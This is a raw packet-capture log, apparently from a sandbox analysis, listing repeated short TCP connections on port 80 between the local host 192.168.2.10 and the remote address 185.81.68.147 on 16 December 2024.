                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.296394110 CET8049796185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.296602964 CET4979680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.297859907 CET4979680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.403384924 CET4980280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.419276953 CET8049796185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.523305893 CET8049802185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.523809910 CET4980280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.523907900 CET4980280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.644105911 CET8049802185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.646753073 CET4980280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:19.766678095 CET8049802185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.162053108 CET8049802185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.162147045 CET8049802185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.162198067 CET4980280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.163696051 CET4980280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.278198957 CET4980880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.283390999 CET8049802185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.399748087 CET8049808185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.399863005 CET4980880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.399976015 CET4980880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.519800901 CET8049808185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.519893885 CET4980880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:21.639739037 CET8049808185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:22.949085951 CET8049808185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:22.949392080 CET8049808185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:22.949460030 CET4980880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:22.950680017 CET4980880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.059335947 CET4981480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.070382118 CET8049808185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.179295063 CET8049814185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.179466009 CET4981480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.179466009 CET4981480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.299612999 CET8049814185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.300108910 CET4981480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:23.420305014 CET8049814185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.801173925 CET8049814185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.801623106 CET8049814185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.801707983 CET4981480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.802602053 CET4981480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.918674946 CET4982080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:24.922749996 CET8049814185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.038535118 CET8049820185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.038633108 CET4982080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.038700104 CET4982080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.158674955 CET8049820185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.158833981 CET4982080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:25.279007912 CET8049820185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.689558983 CET8049820185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.689584970 CET8049820185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.689646006 CET4982080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.691737890 CET4982080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.793802977 CET4982180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.811475039 CET8049820185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.913961887 CET8049821185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.914136887 CET4982180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:26.914220095 CET4982180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:27.034631014 CET8049821185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:27.034698009 CET4982180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:27.154491901 CET8049821185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.528179884 CET8049821185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.528254986 CET8049821185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.528316975 CET4982180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.529540062 CET4982180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.637543917 CET4982780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.649347067 CET8049821185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.757556915 CET8049827185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.757673979 CET4982780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.757741928 CET4982780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.877579927 CET8049827185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.877691031 CET4982780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:28.997528076 CET8049827185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.430403948 CET8049827185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.430651903 CET8049827185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.431598902 CET4982780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.431598902 CET4982780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.543647051 CET4983380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.552483082 CET8049827185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.663688898 CET8049833185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.663892984 CET4983380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.663935900 CET4983380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.784409046 CET8049833185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.784568071 CET4983380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:30.904568911 CET8049833185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.326944113 CET8049833185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.327085972 CET8049833185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.328087091 CET4983380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.328140020 CET4983380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.434370995 CET4983980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.447952032 CET8049833185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.554435968 CET8049839185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.554856062 CET4983980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.554856062 CET4983980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.674861908 CET8049839185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.677062988 CET4983980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:32.797131062 CET8049839185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.187644005 CET8049839185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.187725067 CET8049839185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.187794924 CET4983980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.197679043 CET4983980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.309523106 CET4984580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.317516088 CET8049839185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.429420948 CET8049845185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.429500103 CET4984580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.429608107 CET4984580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.549339056 CET8049845185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.549412012 CET4984580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:34.669353962 CET8049845185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:35.927350998 CET8049845185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:35.927472115 CET8049845185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:35.927540064 CET4984580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:35.929704905 CET4984580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.043623924 CET4985180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.050014973 CET8049845185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.163592100 CET8049851185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.163749933 CET4985180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.163839102 CET4985180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.285494089 CET8049851185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.285625935 CET4985180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:36.405814886 CET8049851185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.620157957 CET8049851185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.620182991 CET8049851185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.620326996 CET4985180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.622677088 CET4985180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.731240034 CET4985280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.742554903 CET8049851185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.851202011 CET8049852185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.851310968 CET4985280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.851574898 CET4985280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.971570015 CET8049852185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:37.971693993 CET4985280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:38.091690063 CET8049852185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.545030117 CET8049852185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.545075893 CET8049852185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.545207977 CET4985280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.546411991 CET4985280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.652923107 CET4985880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.666208982 CET8049852185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.772780895 CET8049858185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.772855043 CET4985880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.772917986 CET4985880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.892812014 CET8049858185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:39.892905951 CET4985880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:40.012695074 CET8049858185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.371892929 CET8049858185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.372005939 CET8049858185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.372556925 CET4985880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.373686075 CET4985880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.481148005 CET4986580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.493407965 CET8049858185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.601660967 CET8049865185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.601798058 CET4986580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.601893902 CET4986580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.722214937 CET8049865185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.722326040 CET4986580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:41.842216969 CET8049865185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.055299997 CET8049865185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.055371046 CET8049865185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.055474997 CET4986580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.056761980 CET4986580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.170696020 CET4987180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.179431915 CET8049865185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.291560888 CET8049871185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.292012930 CET4987180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.308027029 CET4987180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.428057909 CET8049871185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.428137064 CET4987180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:43.547909021 CET8049871185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.747426033 CET8049871185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.747786045 CET8049871185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.747872114 CET4987180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.748784065 CET4987180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.856230974 CET4987780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.868501902 CET8049871185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.975999117 CET8049877185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.976078033 CET4987780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:44.976136923 CET4987780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:45.096966028 CET8049877185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:45.097040892 CET4987780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:45.216927052 CET8049877185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.577703953 CET8049877185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.577976942 CET8049877185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.578510046 CET4987780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.579169035 CET4987780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.684166908 CET4988280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.698781013 CET8049877185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.804620028 CET8049882185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.804734945 CET4988280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.804791927 CET4988280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.924820900 CET8049882185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:46.924904108 CET4988280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:47.045257092 CET8049882185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.401683092 CET8049882185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.401737928 CET8049882185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.401891947 CET4988280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.417243958 CET4988280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.527895927 CET4988480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.537169933 CET8049882185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.647819042 CET8049884185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.648087025 CET4988480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.648087978 CET4988480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.768054008 CET8049884185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.768099070 CET4988480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:48.887974024 CET8049884185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.251863003 CET8049884185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.251888037 CET8049884185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.251961946 CET4988480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.253803015 CET4988480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.356247902 CET4989080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.373608112 CET8049884185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.476141930 CET8049890185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.476239920 CET4989080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.476327896 CET4989080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.704622030 CET8049890185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.704849958 CET4989080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:50.824894905 CET8049890185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.088426113 CET8049890185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.088571072 CET8049890185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.088812113 CET4989080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.090683937 CET4989080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.199888945 CET4989580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.210582018 CET8049890185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.320111990 CET8049895185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.320220947 CET4989580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.320352077 CET4989580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.440105915 CET8049895185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.440181971 CET4989580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:52.560188055 CET8049895185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:53.930058956 CET8049895185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:53.930120945 CET8049895185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:53.930171967 CET4989580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:53.931682110 CET4989580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.043591976 CET4990180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.051422119 CET8049895185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.163539886 CET8049901185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.163611889 CET4990180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.163666964 CET4990180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.283462048 CET8049901185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.284584045 CET4990180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:54.404480934 CET8049901185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.762617111 CET8049901185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.762638092 CET8049901185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.762695074 CET4990180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.764195919 CET4990180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.871690989 CET4990780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.884130001 CET8049901185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.991657972 CET8049907185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.991764069 CET4990780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:55.991816044 CET4990780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:56.111948967 CET8049907185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:56.112029076 CET4990780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:56.231952906 CET8049907185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.592266083 CET8049907185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.592365026 CET8049907185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.592425108 CET4990780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.594134092 CET4990780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.699687958 CET4991180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.713772058 CET8049907185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.819474936 CET8049911185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.819746971 CET4991180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.819811106 CET4991180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.939723969 CET8049911185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:57.939786911 CET4991180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:58.059681892 CET8049911185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.439554930 CET8049911185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.439572096 CET8049911185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.439652920 CET4991180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.441102982 CET4991180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.543375969 CET4991480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.560849905 CET8049911185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.663381100 CET8049914185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.663472891 CET4991480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.663523912 CET4991480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.783262968 CET8049914185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.783324957 CET4991480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:59.904556036 CET8049914185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.133392096 CET8049914185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.133462906 CET8049914185.81.68.147192.168.2.10
